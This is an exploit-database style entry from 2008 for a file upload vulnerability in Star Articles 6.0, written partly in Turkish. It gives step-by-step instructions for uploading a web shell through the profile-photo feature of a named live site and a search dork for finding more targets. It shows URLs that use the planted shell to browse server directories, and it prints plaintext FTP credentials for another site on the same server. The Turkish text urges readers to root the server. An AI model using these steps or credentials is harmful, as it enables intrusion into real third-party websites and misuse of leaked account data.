[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Star Articles 6.0 Remote File Upload Vulnerability
# Published : 2008-11-27
# Author : ZoRLu
# Previous Title : RakhiSoftware Shopping Cart (subcategory_id) SQL Injection Vulnerability
# Next Title : Active Business Directory v 2 Remote blind SQL Injection Vulnerability


[~] Star Articles 6.0 Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] dork: allinurl:"article.download.php"   ( baya bi site var )
[~]
[~] N0T: pls dont make demos ( demolarI hacklemeyin LUTFEN kucuk bir rica )
[~] -----------------------------------------------------------

expl:

http://script//authorphoto/user_name[id].php

example:

http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site )

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )

hemen hacklemeyin arkadaslar server?? kurcalayIn bakIn misal:

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F

bir cok site var. ya rootlay??n yada tek tek cak??n config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;) 

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F

bu serverdaki bir site icin:

ftp://ftp.ababy.com.au/  ( ftp pass ve username )

user: kiddybab

pass: KidEw1nk08

ne biliyim iste biseler yapmaya calIsIn amacIm yardImc?? olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;)


first register for site

after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php )

click to gozat button and select your shell after upload you shell

more after go repat edit profile page and you look you photo. right click to you photo

select to properties copy photo link and paste you explorer.

go your shell

examp:

user: trt-turk@hotmail.com

passwd: zorlu1

login: 

http://www.lcfarticles.com/user.login.php

shell:

http://www.lcfarticles.com//authorphoto/zorlu40.php


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & RedHaK
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# www.Syue.com [2008-11-27]